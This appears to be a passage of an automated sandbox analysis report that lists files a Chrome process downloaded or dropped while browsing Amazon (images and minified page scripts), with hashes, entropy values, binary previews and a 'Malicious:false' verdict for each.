                                                                                                                                                                                                        Entropy (8bit):7.7983762557864855
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r8ugddGbnVg5drcspO38av1A43N+klwuwmpCVBo:Tj1rcspOMb433P1iBo
                                                                                                                                                                                                        MD5:8E65C5BF438DA029BEED5759985ED82F
                                                                                                                                                                                                        SHA1:47C01210115A756F85B952564D2AF49FC170DB10
                                                                                                                                                                                                        SHA-256:39495131401B71CA51F5B4D4A1746037A0652EC179D51E0D228933D0AE8145B7
                                                                                                                                                                                                        SHA-512:B93002AD79E156246AF9A91F6829B55062BD786A08C47D47F031C65EB717370082B131BC65620A94ED4C79AA206961F312B69D2DE92A4D4E6CA401DE069493E0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_Manual_1224505_1174644_UAE_3096775_153x125_2X_en_AE._SY116_CB431807455_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!..1AQ..Ua...."235BRTq........#Crt....$%b....................................................!12Q"...3Aa............?.........DD....D@...DD....D@...D^..$.......q..ZR.ed2..=...6....$.w......Eu..YH....I.f.T..qJ>f..T-g.K.[.....9..H....}........k..}......>.{$tQ..R.?W7.o.V...tC7...9mOC..d..'...?yM).\.S..?.w...S..z...bE.M.....yf?.u.3_.Q.<3F.$.f?K.&..@G......!../.e." .eC\._.j.5......u..._..8423..........._?]'.9d...AL."o...d.3...3.9.L.I.T.6.J.>.I..C#.E.......PW]F......b/...].[V.....l.lT.6..9V..S...j..5f.+n).....Os.e.PS$`.........e.L..../~i...Al....:q.u...^.1K1.&?..}e.....G/3.lA.2.$..vo''...SPW '...vU.h.N..K...A..I0.5N...../1E#..%.A8.P..$..N.M.e......-.f...F...\^....S.....<...`..L_.,.F75.g.G...R.$L.&{.h..#w2.g.=..?......$...#.s...z....qk)d.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 64 x 64
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8865
                                                                                                                                                                                                        Entropy (8bit):7.881132938956866
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Y1cVEDjZAvmuIcq09pk4IYIhmJPjfr+UYN36:Y64jGeMpk4IYDJPjyUYd6
                                                                                                                                                                                                        MD5:B05B81750794CA693E9589C0A171634F
                                                                                                                                                                                                        SHA1:FA91375275E3E1C8FCD8F79BCAE5D85593A33C67
                                                                                                                                                                                                        SHA-256:FF24D4B094AB1896672F4C8D387150C74BBB2493F7D01BEA7C87247AA0AB3BB5
                                                                                                                                                                                                        SHA-512:0C1FBBBD92EAD677C12E4B8CC40239FF66D90A899180C0816A4827F982CB45DD259D24BBC08C34FF737BDE5D3BA3638FF99CA33F77D7C0D640B6970969D3B5EB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/G/39/personalization/ybh/loading-4x-gray._CB485916920_.gif
                                                                                                                                                                                                        Preview:GIF89a@.@............................!..NETSCAPE2.0.....!..XMP DataXMPa1a8-9458-1177-8dcc-94086be1eca9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.!.......,....@.@....h..#.@*)..1..`.P.v.......p...e..}...7.Zm.[....O&$..#J...HN.4%=...F`H..n..4<+g+....F...I....u.ayn=>.u.K.dTw...Ln..w..u.1c.}...u.~.I...;G`..p....]........j..-....@j.My....R...$$....R.4.p.0..........G..p..!]}....0.vxq...]..(T..`...r.. ."...Z,c.@.....P..%.c.w..t..g`...Q..p.C..+M.."fK^.r..Q.M.6...S..FE..........*...Uo....J..>.v`..+W.:.,{....i.bl{...j..(.....w=...o1.p=H..vC.]...&....;.8f\.... .T.m.....$..\.....W;F..4h&.Y..3..*.so..-B..#...Z....uB.....KAd...`.w....|x.....?.||...O..9.w.Y..O..m......x..d.~.R.To.IvI..!.......,....@.@....x....H..8.3...TP[i2Q....g...8..[..-.....+...a.fDj............8....+.....&Ue.....a.e....`.n;t@z.f........jw.\.....v?\f...(z.z........k....H.........~@...G........v.....^...H.....N......e......a..........e.....e.......W......,Pp.A........:|..2,(..c.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2292
                                                                                                                                                                                                        Entropy (8bit):7.727572138343634
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r65G5aIWn8GZC61ByGPI/1wPbL5fSqYAjWFVNLYeBv:TBgaId1KbNSbAjQLBv
                                                                                                                                                                                                        MD5:DB70EFDE5DB90E23E5AB91FD80CB1FD4
                                                                                                                                                                                                        SHA1:586DB35F0C7F3B3A5D056E0936BD1288F34F477F
                                                                                                                                                                                                        SHA-256:B36FA63BE6BAAF814B7766D6B9AD67550C3255F07EFF584ADD5AAAE68EEDF0CE
                                                                                                                                                                                                        SHA-512:C075F354E6A8A61445EFDF1642C168E94415787A42ECEE13A4F82F52EFC3995B2DEF8F0DFD152AC3DA5414461FDD7EDDBFD8446B5B4AEAD79F9D324D61884A46
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................1Q.!q..A."2...#3BRabrs...C......................................................1!.."Qa..#3A..2q.............?..v.Xr..%.(.vF..I.r..d.6....r..d.6....r..d.6....r..d.6....r..d.6..U...v.a]W....$.{.3.=....7...RVC4.s..d.2..c.{G....^......6..(.vR".Q.6..(.vRD..6..(.vRD..6..(.vRD..6..(.vRD..6..(.vRD.n....[.z.$.D@DD.D...l..@..Od.c.8...x[-|...$,....o.C..kg.x......?!..D....7'.../..q.!W..O.<d.H.....`u...RWT...r.gU....8....Gw.<..r...I>d..D..<.dv....s....n-.W(..\5v....#/......R[....n......w.|?.../.1..G3.m8....&F....:;8[=..c.qD...Nl..}.4[gn..'..........`.1WQ?$...|..31........gV...t<y"o.5v..".A[.!MMW..Q.ooI..;]Z[.vbbu"" ""." ""..F..J-...." ""..u\hp<ZPl.N.4....~/^.b...>O.d..US.s4....omR....r1S..I`._r.:8...\.,akZ.kA..B.aVK...}....9..4..#>...Rda.e...#^GB5
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):215
                                                                                                                                                                                                        Entropy (8bit):4.97423508161732
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:2LGDtF4IzO/Bqkhab4KYK7vfITow+1MRR1anMAuLhtI:2Q3JC/BVab4NK7vftjMzI
                                                                                                                                                                                                        MD5:2115ADCB9BE68682D036FDD4BB9BCFB0
                                                                                                                                                                                                        SHA1:4EA836ED7D69B815680D0A419BA4FFE1E1DCFD55
                                                                                                                                                                                                        SHA-256:51BF16CE55A5D6EA57A258B90F7ACBF586CE94A8770EA55860D345BB821BD2F5
                                                                                                                                                                                                        SHA-512:B1F0F9613CDFD0A08149779686CF185B1AB8FE514FC6CD89B5B6AF08D894006DBAA31D8916EE90B83517983575ADE235EDA8E5482C388A94678390A331F793EA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(c){var b=window.AmazonUIPageJS||window.P,d=b._namespace||b.attributeErrors,a=d?d("CartComparisonAssets",""):b;a.guardFatal?a.guardFatal(c)(a,window):a.execute(function(){c(a,window)})})(function(c,b,d){});
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):46703
                                                                                                                                                                                                        Entropy (8bit):7.9860182763052405
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:hiw+dr9LX46FS7PiyWVhHVGKmWgvfyaWAZI+7Kl/ceRw/jrgOjgj6XnFGR5Y:hZ+drFhy0F0fyaWYK/lyr7j7nF45Y
                                                                                                                                                                                                        MD5:EA54BF73007BE22445A922FA6A2E9679
                                                                                                                                                                                                        SHA1:5D973809A232F1DF8832206CC31984F2C68F7546
                                                                                                                                                                                                        SHA-256:B3C9D59537E72FA5399A073DCC65A2EFBB3FE4969052238D9D0D5CDBC73D3850
                                                                                                                                                                                                        SHA-512:B21244E328E5F551796071784410396B4A0763BC66F1F2E858B77F4F3ECAAB9A6DC33176190E5CD385278789AEE227C943F7D2ACA35A675D9E5862577EBBC35D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..U.................R..T.....S...........Q.............V..P...".=..O.............N..M..................................$0?..Y..................Q..L&2@....*......................(7.......M../..........................."................&.........#3....+:.......(3B..T...................*5D..........................z..........y}.......oy.sx.......ek...\em...........................`e...jp...................V^e..........;FR....................SLU]...............V....._.......enu.ur0<Ju}...lt|.y.......}..DNU...............I..........8...;AC.......[a.......$.....~..#..w.....W.............T...........C.....X..i..{..V........Y.....~zYZ.......y........Y...........5.........y......IjIL..~`=A._p..bP,1.n4hYN..a.zL..t.. .IDATx..Z]k.........A3BC..?..a.Q....s....4!t.b.-.ni.oh...Ur....^.........?!"!....z....|..D.e.4...0..s.s.Js..O.^...8.g/^.../..d./..~.{....?n.R.V.j..V.{kxk..t...d~...zr.\.0
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3695
                                                                                                                                                                                                        Entropy (8bit):7.651382952207194
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TIL6LmlLUtDDfBCKhc5at0th/8K87kpobu4Plc6sS9b2gSr:UL6ClL4XBD0t/828/tG5r
                                                                                                                                                                                                        MD5:B81C5B4480229D63D9FF5C774A48295C
                                                                                                                                                                                                        SHA1:DA40146DEC9C0BD435FD921B25C748E9E3FEDCDC
                                                                                                                                                                                                        SHA-256:CAE40D63B00DB82B8195DED00FD387D3A9CA86AE0849EABE4A43320BD441CF5D
                                                                                                                                                                                                        SHA-512:A35ECA0D780875607D9FB31BCD9EE15D1186B05C212C7B7371AD66201144B684C0E22D2AA21513A786EAAF54949E0895EEC0979B630FBD122A8DF200EF294175
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.......................................................................................................~...sF..6..(..............Z....4/g)..hY.\.........sU%..W...n......:.Z'...J.3......s..G...+p[..........P:.B/.U..L.*.......a.......I.._...q......l....H..UiU..e.X.\.../..N38.....^k..=.6.@......3...l"..{VM...w.......g.9.}...Z.=~..5........3...........k../.......mn..FS.......@......2.G..[.....'8....?..}9p='C.\.W..g.h.d.....C.{x.".WV-u4...7"g..g9...[...........!..........&.=u.S..7.ar.zkY<o.6.o.......................................................... !234@"1..#p..$AB...........<"..P..A6..K..N.M._..d..5b.U......U.k9..g%..>q..#...._.;3m..!...Uy.i....+....y..r...b.....,..?.7.+tc..2......1|.&.mO.mM.A...|.*.d..d..-![.pA.g/.....O.mM.t.z..A}R2..reW..>.O...e.2.........[.q.d...t..\..FU...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):12602
                                                                                                                                                                                                        Entropy (8bit):7.91213063092888
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:YMYnJzuegeT+jgXEuddddddddd13MTj2mw0rGQg2BLUPeZp6F03raqm7sbe+6W6q:q9T+cUY3MTaZIg21xiqm4S+6W66b
                                                                                                                                                                                                        MD5:8469D7A400DFEC81B5D4B9EA31CD92DD
                                                                                                                                                                                                        SHA1:11812426128F185C6F0392ECB2FB61AA550005DF
                                                                                                                                                                                                        SHA-256:862666125B9D2A84160C863A1E2F31BBEDA84A39EF7A252AA675729A35301055
                                                                                                                                                                                                        SHA-512:DB62D128F0A4086A3E63243B1B7CA0F48DF8600954C5EDE667DF2C2F4C9BF0BB623B7D1F92F32E293C46E689B6CB7E6539E3EEE7E4C71B26EBBC26F1FBD2FCF5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259756_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................................................................................................................."..........2.........................................................................}.....3.C<.e...%....................6.e.b|.__/.o.$....W#...V...:.J................q.pS........;.k.]....%.......8..v.#.D<.......k?%.Yz`......;x...~so;`......k.....a......5..tMXg...{f&..}...y.p....'.M................$...0y.$ewg>Z3~Wg................!.ro....v.=...!..................5E.*.G...).*q...[...Z......r2.j........D...+.s...Cg8..7..o........?..w...?.#.?.....[.....s....O=.-z.\.h.Y 6n..3...........*.]rZ#'@(.......+.#......t.X..|Q....>.3........%#..l...r.X.u2.......[..4.....|............M.q..7m'-.1.L..........,Ti.P......r4.i......}%.Xz.....O}....C....C..P....c..c^....G4....N>.dF9.}W3.zVq..rE.~'.!g.m.a...........).)...] ....i..:.}.7....).n...=.b=.I..1.6d...e.Z.-./..T....%%!.6.P.0.{.1.@........x9
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2251
                                                                                                                                                                                                        Entropy (8bit):7.712917772622557
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r68ALrQsh5JGU4MO5UtpXER+M+QXIJOP8Ody2ZE:TUAnb5YU4X5UtuR+M+MIqd+
                                                                                                                                                                                                        MD5:4A4267F997A1A1E2B54554AA50388730
                                                                                                                                                                                                        SHA1:4A1BC8C381BF0142A8D14FA9FF0C8D36C58A25FF
                                                                                                                                                                                                        SHA-256:6F0AE00124C553682C7523A9F591A70BFC4BA213A75659920C94449A71827FE2
                                                                                                                                                                                                        SHA-512:03B42A4803E7D36BD7F2795C8E8DB95592834AB5F877764A7A5C999ECDAAD145CD2EABEFD5BF3C6A312B76BFC22CB1B76612ED7341FF4895FF174BD87F327234
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1."Aq....23Qacrt...$4Rs.#d..S.................................................!123q.....A.............?....)..DD....D@...DD....D@...DD....D@...DD....D@.(.d.S.b.R|..."..&.....qwW.Q.....h.... >...|....VO...{78R..xA...A.^g.."...Mj...8..+O5P.A#lY.3Gn.....l...}...4.....[.....i.}..7d..7)....*&..`..{..f.....r..m.......4.....Zh.g...3..G+.e....R......#.[z..3.......^..p.}ss.FN-....Guq...y....U...T.mx.....:..G.....K8.k[.e^.....V._0...'`!Y.p.).z/..I.....G......!N......;..?.j&..t.n...56..2...9..""...." ...""..2.5Q}..ZG.mT...>D../.......F......L.G!.}.:.....D.*.Me...j...i-.T.....|...5...S_..S.vNn.eYXx.d.-)..*.....nU...+..S7..C.5..dl...#..d7U..S..5.'ze,\(.[P|@...wK..3....{L...w?_%...F1..(1..U:.;}.Y......+z\..=u8..rE.8._.dy~....:=}..=.......Jv|.}F..c.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 158x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13231
                                                                                                                                                                                                        Entropy (8bit):7.960347291854105
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:Xy7PxHmkIXFmDqEWnbTQBl8dBEZOrNTOFa/EWHQC:ibxHmB13EmbTfEg86T
                                                                                                                                                                                                        MD5:E2EB60631B1046DAECA0933169AEFE58
                                                                                                                                                                                                        SHA1:3AA55D763730C2EB1BA95EBFB2428D4E0B4E6DBC
                                                                                                                                                                                                        SHA-256:8C5D477D61B7A9382CC08151B0C69B22D89A19C050E945179A7FBCFE83B7F631
                                                                                                                                                                                                        SHA-512:84B26FB0CD7E1DA316BC93F21B341608DC517C516A22A4EAA99B034BA4118C46548EDBB7D804AD221E21C2132C8068691BAF148C1D1D992150AB18E87BB0BEC1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/71vUumKmvkL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!..1"A2Q..aq.#B......RS...34CTcrst.......$5Dbd...%....................................................!.1.."Qa2A.#B...q...3..............?..t...v.i..AN.......lW..-r.s:..'?.....k........&Q.{rb.F@.n<...k.....29._......v..}..G......^..'Y`F..kh...?..X...k...Oe..H?...'_@#[.%..?x.o."Y...Y.B..;37..$.s.$....r........... .u.#.......N...-d*..{..hs6@.J\......[ 4..]3../..q[E..X.I(..Y...2+...Z.....$.![..&Y4..`G~{....?......5.P.`j.\.{....E.1p@<..:....#8.@...D|.|.z..7.-l...C2......{.,....-..U...l.Z*...'.}f..rTq.........4a...6..5.e..<o....]...2w....q..pE..)@[.b.....&ehr..r....c...+...Z.W.M.F}R....NVU.Z........F...".=G....2.......a.\....f.r......V...5V..~.....oV...&.".....y...*?{.N.........'_q:..&...O...G.eG.u...'..G.d........V....A.....Q..?.5.jY(+.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 168x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4196
                                                                                                                                                                                                        Entropy (8bit):7.915233707930954
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r8EG6pTDTXXMvSTkuSj3EWJpwUMi5yinf2qnB9P6CnzyJoL9amzeS5DHHs/35:TITHrouSjf8i576UBhz9VHHsb0Qfyuy8
                                                                                                                                                                                                        MD5:C6F3EC68F284FD123708FD0D6E3188D2
                                                                                                                                                                                                        SHA1:D5C423A27AA99A94B2D1E26C82C9F7C2BFD230FD
                                                                                                                                                                                                        SHA-256:44EA003B4FC696C1308CCD2BF71EAE4202504D83C8E70C70F40C785C4EE5BC8F
                                                                                                                                                                                                        SHA-512:449279C5C2407EAD4516AC83D240897E472EAE36E07DFD19FA9AC130CCE7F30C4789AA0561820C9DF9B16598EBC863BFFFB1A6F3D7BA1E7FDA353483FD17A97F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/81Oo9KYmy3L._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!...1Aast....."#$QRST...&345BCq.....%2.......6Dbcdue..............................................A..!1Q............?..Z../a.....6.:ag.w...P.w.}V...I..&..._..._x.uV..1.u....*I#..V..x..E..^.W.....:m;.m...4..5.>.VZ.:..e...C.Q......I.......}.`....D_v...N%V-....-.{[..h65s....%....Sj.?...D..I.T......cs.Y(..7Y...........z....6..TW.B}....q...#..O.......#R....m.}O.o~~..&.H..U.j.o.GMP.T......I;.m._.z.1f...w.m..%....V...}38.:...O..G...ryj.n.5.?7G.S...Ge6j.>......4.....i.......&...vj..$6.j......n....a.m../.V.5Q..#...e......x..y.J.f1.t.'?(.....U........5Q.........=.1...+!.|...b....N.t....U..)"....0..S.#E$....Q....y..=...k=!lU.2Co...o.o.....w8y<j...M,.....f...u.D........J..........t./....T.2:.....Fl.....-.&.f........F..W0-..........t..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1000
                                                                                                                                                                                                        Entropy (8bit):7.724860875898492
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:27/6CDzOEYjE9Jbsu1RI29ULP0HEeUKT9CDNFkLGETC3:27/6ezYS1RI/teUKT8DyK
                                                                                                                                                                                                        MD5:2C6A95FD2D67DF42D3AD5B33331A9D03
                                                                                                                                                                                                        SHA1:4278519E27AB255FAF978401FD13DE414A918C2D
                                                                                                                                                                                                        SHA-256:FC87BA436C7378A076089E3942C37CBFC4CCDBC6383BA1DABC28971487C1C6F9
                                                                                                                                                                                                        SHA-512:A4C1E249F2B7DCDE4110AE0B0567A9426FF7DFCDC39CC07BFA98A7F47B19AE604E2ECD231365011FBE28A32496F7F6A0D1F34920595C8905C5488E46FF925F2E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR... ... .....szz.....pHYs.................sRGB.........gAMA......a....}IDATx..W.O.A..3..!.......A...$&z....r.D.oz....../R.....b.E....p..@?8t9..5.@.c.......vk..;m.}.......Kd2...e.m..."$.4..'....{..2>mf.e-.om. ....e.....f3.....LX..]..f....*.<..5..../.P.{.5*..@.<._.Xj...,....(.A.j...S....6.....V.l5x..j:.r;9.......3...P...rl.Yp99.....r..+&....5e..*.a..y.~....Vv........a..m....I.J.e+..Z:=Q..b.^.P .(.."O.KM........1.........F:..P../^..6..n.X..V....<.*.m.c.NN..../4x.....g..2.w.i..;..`K...........U.^.^U?.|~.jD*..r&...<.q.{..b.........a..gz8c......~X..2...h2...P7..+...1.!...~...........Ca.x.N.x...0..........5..&\.Y..P/0&.k..i...?..*.Z.....i...OL...=..Z......n.W.<.3cb.d..&,......z...oI..b#(.......*..b..T/..#X,.g....Q.Q .S..G..f5....E.t];e...tn.D......4.E%=.$.[6.+c U;.e"..i...d..WP.......{w..p.T!..yQ.(..8..l...eO].d........I.K)^.0..J.*/...%...M5........Uj...D+:..{..a..w%UU1.........G8*.H......Z......X...1~.~o.....O....IEND.B`.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (523)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):9763
                                                                                                                                                                                                        Entropy (8bit):5.5576256209320105
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:6U7KggJdFc65eODBRWPWVJfZZ4CD7N1bNa+AqDWzEF7jTwT8U:6U7Knz5eiBRhVjvriYlU
                                                                                                                                                                                                        MD5:6EED3151A81957F00C3AA5AD97F78CAB
                                                                                                                                                                                                        SHA1:6C0E9AD0ACB70ECB40B78B05CC7273D5FF882C97
                                                                                                                                                                                                        SHA-256:8A1CA9608771693D06B0109E1E442D495DA603F32182A6527F9F1026C84780E9
                                                                                                                                                                                                        SHA-512:92462B00575FE2B761D3159F7ACE5D5FF4C56B71228925B187FEF8E164D5F8C4354215AC2BEF26F0532AA162257AEF285C8EEB902F4EFF187FD9DA8FCCBBE98A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/31bJewCvY-L.js
                                                                                                                                                                                                        Preview:(function(c,m){function y(a){if(a)return a.replace(/^\s+|\s+$/g,"")}function x(a,g){if(!a)return{};var b="INFO"===g.logLevel;a.m&&a.m.message&&(a=a.m);var f=g.m||g.message||"";f=a.m&&a.m.message?f+a.m.message:a.m&&a.m.target&&a.m.target.tagName?f+("Error handler invoked by "+a.m.target.tagName+" tag"):a.m?f+a.m:a.message?f+a.message:f+"Unknown error";f={m:f,name:a.name,type:a.type,csm:N+" "+(a.fromOnError?"onerror":"ueLogError")};var h,l=0;f.logLevel=g.logLevel||A;g.adb&&(f.adb=g.adb);if(h=g.attribution)f.attribution=.""+h;if(!b){f.pageURL=g.pageURL||""+(window.location?window.location.href:"")||"missing";f.f=a.f||a.sourceURL||a.fileName||a.filename||a.m&&a.m.target&&a.m.target.src;f.l=a.l||a.line||a.lineno||a.lineNumber;f.c=a.c?""+a.c:a.c;f.s=[];f.t=c.ue.d();if((b=a.stack||(a.err?a.err.stack:""))&&b.split)for(f.csm+=" stack",h=b.split("\n");l<h.length&&f.s.length<F;)(b=h[l++])&&f.s.push(y(b));else{f.csm+=" callee";var m=z(a.args||arguments,"callee");for(h=l=0;m&&l<F;){var v=G;m.skipTr
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
